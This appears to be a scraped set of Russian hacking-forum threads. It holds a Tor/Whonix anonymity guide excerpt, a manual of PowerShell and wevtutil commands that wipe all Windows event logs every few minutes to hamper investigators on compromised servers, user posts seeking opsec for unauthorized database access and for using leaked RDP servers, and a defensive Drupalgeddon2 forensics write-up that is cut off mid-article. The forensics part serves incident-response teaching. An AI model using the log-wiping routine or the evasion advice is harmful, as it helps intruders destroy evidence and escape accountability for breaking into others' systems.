Скрытие местонахождения: местонахождение пользователя остаётся секретным.

Режим 3: пользователь не анонимен и использует Tor; любой получатель

Сценарий: Вход под настоящим именем в любой сервис вроде веб-почты, Twitter, Facebook и другие.
Пользователь очевидно не анонимен. Как только настоящее имя используется для входа в аккаунт, веб-сайт знает личность пользователя. Tor не может обеспечить анонимность в таких обстоятельствах.
Настоящий IP-адрес / местонахождение пользователя скрыты.
Скрытие местонахождения: местонахождение пользователя остаётся секретным.

Режим 4: пользователь не анонимен; любой получатель

Сценарий: Обычный сёрфинг без Tor.
Пользователь не анонимен.
Настоящий IP-адрес / местонахождение пользователя раскрываются.
Местонахождение пользователя раскрывается.

Заключение

Не лучший вариант смешивать режимы 1 и 2. Например, если человек использует IM-менеджер или почтовый аккаунт в режиме 1, то неразумно использовать тот же аккаунт в режиме 2. Причина в том, что пользователь смешивает абсолютную анонимность (режим 1) с выборочной анонимностью (режим 2; поскольку получатель знает пользователя).

Также не лучший вариант смешивать два или более режимов в одной сессии Tor , потому что они могут использовать один и тот же выходной узел, что ведёт к соотнесению личностей.

Также есть вероятность, что комбинации разных режимов будут опасными и могут привести к утечке персональной информации или физического местонахождения пользователя.

Лицензия

Лицензия для раздела «Не смешивайте режимы анонимности»:

Не изменяйте настройки, если последствия неизвестны

Обычно безопасно изменить настройки интерфейса для приложений, которые не подключаются к Интернету. Например, галочки «Не показывать больше ежедневные советы» или «Скрыть эту панель меню» не повлияют на анонимность.

Перед изменением любых настроек, которые вызывают интерес, сначала сверьтесь с документацией Whonix. Если изменение внесено в документацию и не рекомендовано, то старайтесь придерживаться настроек по умолчанию. Если изменение не внесено в документацию, то осторожно изучите предложенное действие перед тем, как осуществить его.

Изменение настроек для приложений, которые подключаются к интернету (даже настроек интерфейса) должно быть тщательно изучено. Например, удаление панели меню в Tor Browser для увеличения области просмотра страницы не рекомендуется. Это изменяет обнаружаемый размер экрана, что ухудшает отпечаток пользователя.

Изменение сетевых настроек можно допускать с огромной осторожностью, и только если последствия точно известны. Например, пользователям следует избегать любых советов, которые относятся к «настройке Firefox». Если настройки считаются неоптимальными, то изменения должны быть предложены в релиз и применятся для всех пользователей Tor Browser в следующей версии.

Не используйте чистый веб и Tor одновременно

Используя одновременно не-Tor браузер и Tor Browser, вы рискуете однажды их перепутать и деанонимизировать себя.

При одновременном использовании чистого веба и Tor также возникают риски одновременных соединений к серверу по анонимным и неанонимным каналам. Это не рекомендуется по причинам, изложенным в следующем разделе. Пользователь никогда не может чувствовать себя безопасно, посещая одну и ту же страницу одновременно по анонимным и неанонимным каналам, потому что он видит только URL, но не то, сколько ресурсов запрашивается в фоне. Много разных сайтов размещаются в одном облаке. Сервисы вроде Google Analytics представлены на большинстве сайтов и поэтому видят много анонимных и неанонимных соединений.

Если этот совет игнорируется, то у пользователя должно быть по меньшей мере два разных десктопа, чтобы предотвратить путаницу между браузерами.

Не подключайтесь к серверу анонимно и неанонимно одновременно

Сильно не рекомендуется создавать соединения Tor и не-Tor одновременно к одному удалённому серверу. В случае разрыва связи с Интернетом (а это со временем произойдёт) все соединения прервутся одновременно. После такого события противник легко определит, какой публичный IP-адрес/местоположение принадлежат какому IP-адресу/соединению Tor, что потенциально напрямую идентифицирует пользователя.

Такой сценарий также даёт возможность провести другой вид атаки со стороны веб-сервера. Скорость Tor и не-Tor соединений может быть увеличена или уменьшена, чтобы проверить наличие корреляции. Так, если оба соединения ускоряются или замедляются в унисон, то можно установить взаимосвязь между сессиями Tor и не-Tor.

Лицензия для раздела «Не подключайтесь к серверу анонимно и неанонимно одновременно»:

Не путайте анонимность и псевдонимность

В этом разделе объясняется разница между анонимностью и псевдонимностью. Определение терминов всегда представляет сложность, потому что требуется консенсус большинства.

Анонимным соединением считается соединение с сервером назначения, когда этот сервер не имеет возможности ни установить происхождение (IP- адрес/местонахождение) этого соединения, ни присвоить ему идентификатор .

Псевдонимным соединением считается соединение с сервером назначения, когда этот сервер не имеет возможности установить происхождение (IP- адрес/местонахождение) этого соединения, но может присвоить ему идентификатор.

В идеальном мире можно достичь совершенной анонимности, используя сеть Tor, браузер Tor Browser, компьютерное оборудование, физическую безопасность, операционную систему и так далее. Например, в такой утопии пользователь может зайти на новостной сайт, и ни новостной сайт, ни интернет-провайдер сайта не будут иметь понятия, заходил ли этот пользователь раньше.

С другой стороны, неидеальный сценарий возможен, если программное обеспечение используется неправильно, например, при использовании стандартного браузера Firefox в сети Tor вместо безопасного Tor Browser. Несчастный пользователь Firefox по-прежнему защитит своё первоначальное соединение (IP- адрес/местонахождение) от обнаружения, но можно использовать идентификаторы (вроде кукисов), чтобы превратить соединение в псевдонимное. Например, сервер назначения может сделать запись в журнале, что «пользователь с id 111222333444 смотрел Видео A во Время B в Дату C и Видео D во Время E в Дату F». Эту информацию можно использовать для профилирования, которая со временем будет становится всё более исчерпывающей. Степень анонимности постепенно сокращается, а в худшем случае это может привести к деанонимизации.

Как только пользователь зашёл в аккаунт на веб-сайте под своим именем пользователя, например, в веб-почту или на форум, то соединение по определению больше не является анонимным, а становится псевдонимным. Происхождение соединения (IP-адрес/местонахождение) всё ещё скрыто, но соединению можно присвоить идентификатор; в данном случае, это имя аккаунта. Идентификаторы используются для журналирования разных вещей: время, когда пользователь что-то написал, дата и время входа и выхода, что именно пользователь написал и кому, используемый IP-адрес (бесполезен, если это выходной узел Tor), сохранённый отпечаток браузера и так далее.

У Максима Каммерера, разработчика Liberté Linux , имеются в корне отличные идеи об анонимности и псевдонимности, которые нельзя утаивать от читателя:

Я не видел убедительных аргументов в пользу анонимности по сравнению с псевдонимностью. Расширение степени анонимности — то, что разработчики Tor делают для публикации новых научных статей и обоснования финансирования. Большинству пользователей нужна только псевдонимность, при которой скрыто местонахождение. Наличие уникального браузера не раскрывает магическим образом местонахождение пользователя, если этот пользователь на использует этот браузер для не-псевдонимных сессий. Наличие хорошего заголовка браузера также немного значит для анонимности, потому что есть много других способов раскрыть больше информации о клиенте (например, через различия в выполнении Javascript).

Click to expand...

Не распространяйте первым свою ссылку

Не поддавайтесь искушению быть одним из первых, кто рекламирует ваш анонимный проект! Например, нецелесообразно распространять ссылки, если пользователь:

Создал анонимный блог или скрытый сервис.
Имеет твиттер-аккаунт с большим количеством фоловеров.
Поддерживает большую новостную страницу в чистом вебе или нечто подобное.

Чем сильнее личности отделены друг от друга, тем лучше. Конечно, в определённый момент пользователь может или даже должен быть «в курсе» нового проекта, но этот момент нужно выбирать с чрезвычайной осторожностью.

Не открывайте случайные файлы и ссылки

Если пользователю прислали файл любого типа или ссылку на файл (или на случайный URL/ресурс) по электронной почте или другим способом, требуется осторожность независимо от формата файла. Отправитель, почтовый ящик, аккаунт или ключ могут быть скомпрометированы, а файл или ссылка могли быть специальным образом подготовлены для заражения системы пользователя при открытии в стандартном приложении.

Безопаснее не открывать файл стандартным инструментом, который предполагается использовать создателем файла. Например, PDF нельзя открывать программой просмотра PDF, или если файл доступен публично, можно использовать бесплатный онлайновый сервис просмотра PDF. Для большей безопасности есть вариант дезинфицировать PDF в Qubes-Whonix или открыть файл или ссылку в DisposableVM, так что он не сможет скомпрометировать платформу пользователя.

Не используйте верификацию по (мобильному) телефону

Веб-сайты вроде Google, Facebook и другие попросят (мобильный) телефонный номер, как только вы попытаетесь войти через Tor. Если только пользователь не исключительно умён или имеет альтернативу, эту информацию нельзя предоставлять.

Любые телефонные номера будут внесены в журнал. SIM-карта скорее всего зарегистрирована на имя пользователя. Даже если это не так, получение SMS выдаёт местоположение. Пользователи могут попробовать анонимно купить SIM- карту далеко от своего обычного домашнего адреса, но всё равно остаётся риск: сам телефон. Каждый раз при регистрации в сотовой сети провайдер сохраняет серийный номер SIM-карты и серийный номер телефона. Если SIM-карта куплена анонимно, а телефон нет, то анонимности не будет, потому что два серийных номера свяжут вместе.

Если пользователь действительно хочет пройти верификацию по номеру мобильного телефона, то рекомендуется уехать далеко от дома, найти свежий телефон с новой SIM-картой. После верификации телефон следует выключить, и немедленно после этого телефон и SIM-карту нужно полностью уничтожить. Это делается путём сжигания или другими изобретательными (надёжными) способами уничтожения.

Пользователи могут попробовать найти онлайновый сервис, который получит персональное SMS от их имени. Это сработает и обеспечит анонимность. Проблема в том, что в Google и Facebook такой метод вряд ли сработает, потому что они активно вносят в чёрные списки такие номера верификации. Другой вариант — найти кого-либо, кто получит SMS вместо вас, но это лишь перенесёт риски на другого человека.

Аргументация

Читатель может пропустить этот раздел.

Данная статья рискует констатировать очевидные вещи. Но следует задать вопрос: «Очевидные для кого?» Всё вышесказанное может быть просто здравым смыслом для разработчиков, хакеров, гиков и других людей с технологическими навыками.

Но указанные группы людей склонны терять контакт с нетехническими пользователями. Иногда полезно почитать руководства по юзабилити или отклики от людей, которые никогда не появляются в списках рассылки или на форумах.

Например:

To Toggle, or not to Toggle: The End of Torbutton:

Майк, я полностью анонимен, если захожу в свой аккаунт Facebook? Я использую Firefox 3.6 через Tor c NoScript на машине Windows 7. Спасибо.

Click to expand...

Чтобы убедиться, что частоты мобильного телефона на отслеживаются, я наполняю раковину водой и накрываю голову крышкой кастрюли во время телефонного разговора, сказал один из собеседников, 28-летний мужчина, который сбежал из страны в ноябре 2010 года.

Click to expand...

Примечания

1. ↑ https://lists.torproject.org/pipermail/tor-dev/2012-April/003472.html
2. ↑ Tor Browser должен устанавливать для запроса имя пользователя SOCKS на основании реферрера
3. ↑ Первые вряд ли когда-нибудь удалят данные, поскольку профилирование является основным методом монетизации пользователей с «бесплатными» аккаунтами. Профилирование используется для целевой рекламы и для наращивания большой базы данных пользователей, которую можно продать третьей стороне ради прибыли.
4. ↑ [To Toggle, or not to Toggle: The End of Torbutton](https://blog.torproject.org/blog/toggle-or-not-toggle- end-torbutton)
5. ↑ https://en.wikipedia.org/wiki/Server_log
6. ↑ https://en.wikipedia.org/wiki/Deep_packet_inspection
7. ↑ https://www.torproject.org/docs/faq.html.en#ChoosePathLength
8. ↑ https://www.torproject.org/docs/faq.html.en#ChooseEntryExit
9. ↑9.0 9.1 9.2 Это изначально опубликовали adrelanos (proper) в TorifyHOWTO (w). Adrelanos не защищает копирайт, так что текст можно повторно использовать здесь. Он опубликован под той же лицензией, что и страница DoNot.
10. ↑ bridges#If_Tor_Use_is_Dangerous_or_Deemed_Suspicious_in_your_Location
11. ↑ В частности, Facebook хранит записи обо всех, кто просматривает страницы с кнопкой Like от Facebook.
12. ↑ https://www.securitee.org/files/trackblock_eurosp2017.pdf
13. ↑ 15 крупнейших сторонних сервисов: doubleclick.net, google.com, googlesyndication.com, googleapis.com, gstatic.com, admob.com, googleanalytics.com, googleusercontent.com, flurry.com, adobe.com, chartboost.com, unity3d.com, facebook.com, amazonaws.com and tapjoyads.com.
15. ↑ Например, в Twitter твиты, Follow и встроенные твиты [используются для записи истории посещённых страниц браузера](https://www.eff.org/deeplinks/2017/05/new-twitter-policy-abandons- longstanding-privacy-pledge). Если посетить страницу, где есть что-нибудь из перечисленного, браузер делает запрос к серверам Twitter, содержащий заголовок посещённой страницы. Уникальный кукис позволяет Twitter выстроить историю посещённых страниц, даже для тех, кто не является пользователем Twitter (например, если Tor Browser не используется).
15. ↑ https://www.securitee.org/files/trackblock_eurosp2017.pdf
16. ↑ Например, продвинутые противники полагаются на сторонние следящие куки для деанонимизации пользователей Tor и выявления мишеней для взлома.
17. ↑ Поскольку они известны получателю.
18. ↑ Но эту информацию легко установить по записям интернет-провайдера, который связывает интернет-аккаунты с зарегистрированным именем и адресом. Как вариант, эта информация утекает через реальный (clearnet) IP-адрес, который изначально использовали для регистрации в сервисе, поскольку регистрация через Tor обычно блокируется.
19. ↑19.0 19.1 19.2 Например, идентификатором может быть (флеш) кукис с уникальным номером.
20. ↑ К сожалению, защита от фингерпринтинга пока неидеальна в любом браузере, и до сих пор есть незакрытые баги. См. [tbb- linkability](https://trac.torproject.org/projects/tor/query?status=accepted&status=assigned&status=needs_information&status=needs_review&status=new&status=reopened&order=priority&col=id&col=summary&col=keywords&col=status&col=owner&col=type&col=priority&keywords=tbb- linkability) и [tbb- fingerprinting](https://trac.torproject.org/projects/tor/query?status=accepted&status=assigned&status=needs_review&status=needs_revision&status=new&status=reopened&order=priority&col=id&col=summary&col=keywords&col=status&col=owner&col=type&col=priority&keywords=tbb- fingerprinting).
21. ↑ http://dee.su/liberte
22. ↑ [Цитата](http://forum.dee.su/topic/anon-test-for-ll-on-ipcheck- info#65650000000264003) (w)
23. ↑ Для примера: PDF, документ Word, растровые изображения, аудио- и видеофайлы и т. д.
24. ↑ IMSI
25. ↑ IMEI
26. ↑ Однако получатель SMS, вероятно, всего в нескольких «рукопожатиях» от конечного пользователя (в лучшем случае).

P.S. Взято с хабр.

Удаление логов на windows дедике

ID: 676533bbb4103b69df371af0
Thread ID: 69979
Created: 2022-07-12T01:49:07+0000
Last Post: 2022-07-20T11:51:19+0000
Author: peacemaker
Prefix: Мануал/Книга
Replies: 29 Views: 2K

Как бы мы не сидели на сторонних серверах, через прокси, торы и впны. Логирование нужно убирать и удалять логи. Чтобы усложнить работу по ту сторону экрана людям. Тут два способа. Вообще удалить сервисы логирования. Или чистить их скриптами. Вот поговорим о втором варианте.

Конечно, очистку системных журналов, можно выполнить и из графической оснастки просмотра событий — Eventvwr.msc (ПКМ по нужному журналу ->Clear Log), однако начиная с Vista, в Windows используется несколько десятков журналов для различных компонентов системы, и очищать их все из консоли Event Viewer будет довольно утомительно. Гораздо проще очистить логи из командной строки: с помощью PowerShell или встроенной утилиты wevtutil.

Очистка журналов событий с помощью PowerShell
В том случае, если у вас установлен PowerShell 3 (по умолчанию уже установлен в Windows 8 / Windows Server 2012 и выше), для получения списка журналов и их очистки можно воспользоваться командлетами Get-EventLog и Clear-EventLog.

Запустите консоль PowerShell с правами администратора и с помощью следующей команды выведите список всех имеющихся в системе классических журналов событий с их максимальными размерами и количеством событий в них.

Get-EventLog –LogName *

Для удаления всех событий из конкретного журнала событий (например, журнала System), воспользуйтесь командой:

Clear-EventLog –LogName System

В результате, все события из этого журнала будут удалены, а в журнале события останется только одно событие EventId 104 с текстом «The System log file was cleared».

Для очистки всех журналов событий нужно бы перенаправить имена журналов в конвейер, однако, к сожалению это запрещено. Поэтому нам придется воспользоваться циклом ForEach:

Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

Таким образом, будут очищены все классические журналы EventLogs.

Очистка журналов с помощью консольной утилиты WevtUtil.exe
Для работы с событиями в Windows уже довольно давно имеется в наличии мощная утилита командой строки WevtUtil.exe. Ее синтаксис немного сложновато на первый взгляд. Вот, к примеру, что возвращает help утилиты:

Чтобы вывести список зарегистрированных в системе журналов событий, выполните команду:

WevtUtil enum-logs

или более короткий вариант:

WevtUtil el

На экране отобразится довольно внушительный список имеющихся журналов.

Можно получить более подробную информацию по конкретному журналу:

WevtUtil gl Setup

Очистка событий в конкретном журнале выполняется так:

WevtUtil cl Setup

Перед очисткой можно создать резервную копию событий в журнале, сохранив их в файл:

WevtUtil cl Setup /bu:SetupLog_Bak.evtx

Чтобы очистить сразу все журналы, можно воспользоваться командлетом Powershell Get—WinEvent для получения всех объектов журналов и Wevtutil.exe для их очистки:

Get-WinEvent -ListLog * -Force | % { Wevtutil.exe cl $_.LogName }

или так

Wevtutil el | ForEach { wevtutil cl “$_”}

Очистка журналов может быть выполнена и из классической командной строки:

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Но руками делать же это все утомительно. Мы можем собрать команды в скрипт и создать планировщик задача, время выполнения которого к примеру каждые 5 минут. И теперь у нас на сервере нет логов.

P.S. Взято и отредактировано с winitpro.ru

Анонимность для хакера из ЕС/США

ID: 676533bbb4103b69df371b13
Thread ID: 66083
Created: 2022-04-24T04:00:16+0000
Last Post: 2022-05-05T23:56:30+0000
Author: exopius
Replies: 29 Views: 2K

Допустим человек находится в ЕС и получает несанкционированный доступ к базам данных различных сайтов так сказать. Человек использовал только впн. На сколько это опасно вообще? Будет ли админ сайта обращаться в полицию, заметив подозрительный движ в логах? Есть правило не работать по РУ. Но а что если ты не в снг, а в ес? Тебя быстро найдут если захотят, верно? Какие тактики анонимности лучше всего использовать для хакинга если ты в США/ЕС?

Совет по анонимности

ID: 676533bbb4103b69df371b1f
Thread ID: 63053
Created: 2022-02-16T11:21:15+0000
Last Post: 2022-04-24T18:59:42+0000
Author: AngelStar
Replies: 59 Views: 2K

Привет

Я совсем новичок в теме, поэтому во многом еще не разбираюсь, поэтому попрошу не казнить за вопросы)

Дело в следующем: хочу полазить через rdp в сугубо исследовательских целях по дедикам, которые бесплатно сливали на форуме, но очкую за анонимность (врядли хватит бесплатного впна)
Крипты на норм впн нет, думаю в сторону хуникса, но там придется заморачиваться с линухом и qemu, чтобы здраво сделать

В одной из тем мне посоветовали просто ходить по рдп через тор, но не думаю, что этого достаточно для дальшейшего взаимодействия с дедиком, установки по и т.д.

Как можно сделать, чтобы более менее быть сейвовым?

Уроки форензики. Расследуем взлом веб-сервера с Linux, Apache и Drupal

ID: 676533bbb4103b69df371b32
Thread ID: 60704
Created: 2021-12-30T19:31:34+0000
Last Post: 2022-03-18T09:44:13+0000
Author: tabac
Prefix: Статья
Replies: 1 Views: 2K

В этой статье я покажу ход расследования киберинцидента на примере лабораторной работы Hacked с ресурса CyberDefenders. Мы научимся извлекать артефакты из образа диска системы Linux, анализировать их и по этим данным выясним, как злоумышленник скомпрометировал систему.

По сценарию злоумышленники взломали веб‑сервер и завладели полным контролем над ним. Специалисты по реагированию на инциденты получили побитовую копию системного диска скомпрометированной машины на базе операционной системы Linux. Загрузим файл образа и начнем его исследовать.

Разделим наше расследование на три этапа:

Анализ конфигурационных файлов операционной системы Linux.
Поиск точки входа злоумышленников в систему.
Поиск методов постэксплуатации в системе.

Используемые утилиты:

FTK Imager — инструмент для анализа и получения образов диска.
R-Studio — утилита для восстановления данных с диска.
Plaso — утилита на Python, предназначенная для генерации времени событий операционной системы.

МОНТИРУЕМ ОБРАЗ ДИСКА

Прежде чем начать извлекать данные из образа диска, давай разберемся, с каким образом мы имеем дело и как его правильно анализировать. Для этого воспользуемся утилитой file, входящей в Linux.

Code:Copy to clipboard

file  Webserver.E01

![Формат образа диска](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24364%2F1.png&hash=eec423bbcd4b1b465c9b37c8d3019159)
Файл образа диска Webserver.E01 записан в формате Expert Witness Format (EWF) и содержит побитовую копию данных. Сконвертировать его в цифровую копию диска можно с помощью утилиты [EnCase](https://security.opentext.com/encase- forensic).

Полученный образ диска можешь примонтировать в Linux — для этого ставь утилиты lvm2, ewf-tools, sleuthkit, kpartx и воспользуйся мануалом. Но я покажу другой вариант. Примонтируем исследуемый диск в Windows и извлечем из него необходимые артефакты для расследования инцидента.

Откроем утилиту FTK Imager и примонтируем образ диска. Для этого переходим на вкладку File → Image Mounting. В поле Image File выбираем образ Webserver.e01 и вводим настройки, указанные ниже.

![Настройки для монтирования образа](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24365%2F2.png&hash=37ee2de1617a43ce7514ae85d6c0a87d)
Нажимаем Mount, и исследуемый образ должен примонтироваться. Мы увидим следующую информацию.

![Вывод результатов монтирования образа](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24366%2F3.png&hash=e676ec9400aebc28bb406a4aba86c734)
Теперь открываем R-Studio и видим примонтированные виртуальные диски.

![Список примонтированных виртуальных дисков](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24367%2F4.png&hash=7f50a6cd1cf9ef2c79188a8d1d3fb03a)
Нас интересует диск Virtual Storage 1.00 → F, так как его ФС — ext4. Далее выбираем диск F и нажимаем «Сканировать». Утилита R-Studio начнет сканировать адресное пространство диска и искать в нем все файлы, в том числе удаленные. После завершения сканирования переходим в диск F в интерфейсе R-Studio и получим все каталоги и файлы файловой системы.

![Завершение сканирования диска](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24368%2F5.png&hash=2f02c339963582ad1df51094a5b2569f)

![Структура файловой системы виртуального диска F](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24369%2F6.png&hash=e7f8f85141c9f197625385c2535c02d3)

ИЗУЧАЕМ КОНФИГИ ОС

Получим информацию о системе, чтобы понимать, какие сервисы установлены, с какой операционной системой работаем и какие пользователи существуют. Эта информация расположена в каталоге /etc файловой системы Linux. Информацию об имени компьютера ты найдешь в файле /etc/hostname (в нашем случае это VulnOSv2). В файле /etc/os-release содержится информация об операционной системе (Ubuntu версии 14.04.4 LTS).

![Информация о скомпрометированной операционной системе](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24370%2F7.png&hash=5b97a08503471f80036888b9b9bea43a)
В файле /etc/networks/interfaces хранится сетевой адрес, но в нашем случае для получения IP-адреса в сети организации используется протокол DHCP. В каталоге /etc я обнаружил следующее установленное ПО: Drupal 7, веб‑сервер Apache 2, СУБД MySQL и PostgreSQL, а также почтовый сервис Postfix.

Проанализируем информацию о пользователях. Нас интересуют файлы /etc/passwd и /etc/shadow.

![Содержимое файла /etc/passwd](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24371%2F8.png&hash=4dc2680025231bdd637a5ef49a1c10c5)
/etc/passwd содержит информацию о пользователях системы: имя пользователя, идентификаторы пользователя и группы, комментарий, описывающий аккаунт, путь к домашнему каталогу и программа, которая каждый раз запускается при входе пользователя в систему. Нас интересуют пользователи, которые могут запускать командную оболочку /bin/bash при входе в систему. Таких пользователей пять: root, mail, php, vulnosadmin и postgres.

В файле /etc/shadow хранятся хешированные пароли пользователей. Доступ к этому файлу имеет только привилегированный аккаунт.

![Содержимое файла /etc/shadow](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24372%2F9.png&hash=54f7efb6635c3de063cff0eac8e2a4ec)
Формат хеша пользовательского пароля:

Code:Copy to clipboard

$id$salt$hashed

Идентификатор алгоритма id=6 соответствует алгоритму хеширования SHA-512. Попробуй сам скопировать выделенную на рисунке строку хеша пароля пользователя mail и пробрутить его утилитой John the Ripper со словарем rockyou.txt:

Code:Copy to clipboard

john hash.txt --wordlist=rockyou.txt

![Вывод утилиты John](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24363%2F10.png&hash=1dbbe6fefb56ba0dd45f1d03ee7198d0)
Проанализируем файл /etc/group, чтобы понимать, какие пользователи состоят в группе sudo.

![Часть содержимого файла /etc/group](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24373%2F11.png&hash=9f118192f47eb19bc240079dd6998415)
В этом файле содержится 58 групп, а в группу sudo входят пользователи php и mail. Значит, они могут выполнять команды от имени суперпользователя root. Найдем правила о предоставлении доступа для группы sudo. Они описываются в файле /etc/sudoers.

![Содержимое файла /etc/sudoers](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24374%2F12.png&hash=50e3b237a52887632ab31f120b6d861d)
Это правило означает, что все пользователи группы sudo могут выполнять любые действия в системе от имени администратора.

Определим версию и конфигурацию сайта на Drupal. Для этого переходим в каталог /var/www/html/jabc, в файле /var/www/html/jabc/includes/bootstrap.inc содержится версия CMS системы. Это Drupal 7.26 — она уязвима, и для нее есть эксплоиты, дающие удаленное выполнение кода. В качестве веб‑сервера установлен Apache 2. Файл его конфигурации расположен в /etc/drupal/7/htaccess.

Итак, на этом этапе мы с тобой выяснили, с какой операционной системой мы имеем дело, какое ПО на ней установлено и какие настройки заданы.

ИЩЕМ ТОЧКУ ВХОДА

Теперь нам нужно понять, как злоумышленник впервые получил доступ к скомпрометированной системе. Для этого проанализируем логи ОС. Все журналы событий Linux хранятся в каталоге /var/log. Анализ этих файлов и сопоставление со временем начала инцидента позволит нам восстановить полную картину событий.

Первым делом глянем события веб‑сервера Apache. Для этого заходим в каталог /var/log/Apache2. Здесь нас интересуют журналы access.log и error.log, которые содержат события работы веб‑сервера. В файле access.log содержатся запросы к сервису Drupal http://192.168.210.135/jabc/ с IP-адреса 192.168.210.131. 5 октября 2019 года в 13:01:27 (UTC+2) обнаружен POST- запрос к веб‑сервису в параметре name[#markup]. В URL запроса передается закодированная по алгоритму Base64 полезная нагрузка.

![Запросы к Drupal 7.26](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24375%2F13.png&hash=d9b03db47f4b7dd45d6fed9243888e5c)
В Drupal версии 7.26 содержится уязвимость удаленного выполнения кода CVE-2018-7600, позже получившая название drupalgeddon2. В Metasploit существует модуль [drupal_drupalgeddon2](https://gitlab.com/kalilinux/packages/metasploit- framework/blob/db9ab9e30aeabe027757c27a11c0f23919f43f10/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb), который загружает расширенную многофункциональную нагрузку [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about- meterpreter/).

Давай декодируем полезную нагрузку, которая содержится в функции eval(base64_decode()), и посмотрим, что она делает.

![Загружаемая полезная нагрузка](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24376%2F14.png&hash=d915b92c4b29f6c30f3928690222b96a)
Как видно на рисунке выше, код является полезной нагрузкой Meterpreter и содержит IP-адрес 192.168.210.131 и порт 4444 для обратного соединения. Отлично, мы теперь знаем, что злоумышленники проэксплуатировали CVE-2018-7600 в сервисе Drupal версии 7.26 и загрузили в память полезную нагрузку Meterpreter.

Теперь нам нужно найти признаки постэксплуатации. 5 октября 2019 года в 13:17:48 (UTC+2) обнаружен запрос к файлу update.php c параметром cmd=ls.

![Запрос к веб-шеллу update.php](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24377%2F15.png&hash=ffbc7f59b54d20ce83f421f44c988098)
Этот файл мы исследуем чуть позже, а пока заглянем в auth.log в каталоге /var/log. Это один из самых важных артефактов в Linux. Здесь лежат события аутентификации в системе. Для временных отметок в auth.log используется системное время. В нашем случае временная зона выставлена по Брюсселю (UTC+2).

Начиная с 12:39:26 5 октября 2019 года выполнялся подбор пароля пользователя root службы SSH с IP-адреса 192.168.210.131.

![Неудачная попытка подбора пароля пользователя root](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24378%2F16.png&hash=d5cad22b7bd90d642f11abde27c428df)
В 13:06:38 в тот же день создан пользователь php с домашней директорией /usr/php. Далее пользователь php добавлен в группу sudo, что позволяет ему выполнять команды от имени администратора.

![Создание пользователя php и добавление в группу sudo](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24379%2F17.png&hash=de3b947029fe36e60ca69f9bd23b34d2)
В 13:09:18 пользователь mail добавлен в группу sudo.

![Добавление пользователя mail в группу sudo](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24380%2F18.png&hash=4bf56f5115024e8d5ec4eab38750b57c)
В 13:23:34 пользователь mail зашел c IP-адреса 192.168.210.131, порт 57708 службы SSH.

![Вход пользователя mail на скомпрометированный компьютер](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24381%2F19.png&hash=76ba89cf99a0247e5e58e9cae31547b6)
Эта сессия длилась одну минуту.

Файл /var/log/syslog содержит общие системные сообщения. В частности, в нем можно видеть запросы к серверу DHCP и получение IP-адреса: сервер 192.168.210.254 выделил IP-адрес исследуемому компьютеру 192.168.210.135.

![Взаимодействие с сервером DHCP](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24382%2F20.png&hash=cbbb9684813a85dcae1b37739f778e1c)
Теперь заглянем в /var/log/lastlog — этот файл содержит информацию о последних сессиях пользователей. Находим два IP-адреса, с которых производилась авторизация в системе.

![Информация из файла lastlog](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24383%2F21.png&hash=67eb901f6eb909732b9bec477cb3c428)
И наконец, смотрим /var/log/wtmp, этот файл тоже содержит информацию о входе пользователей в систему. Однако он бинарный, поэтому для его чтения используем утилиту utmpdump.

Code:Copy to clipboard

utmpdump wtmp

![Информация о пользователях, авторизованных 5 октября 2019 года](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F7472c376a5f1cc271bff970c5ec52944%2F24384%2F22.png&hash=bfc0f50dc6ecd98f20c16a072e8c0edd)
Файл /var/log/btmp содержит информацию о неудачных попытках входа в систему. Для его чтения также воспользуемся утилитой utmpdump:

Code:Copy to clipboard

utmpdump btmp

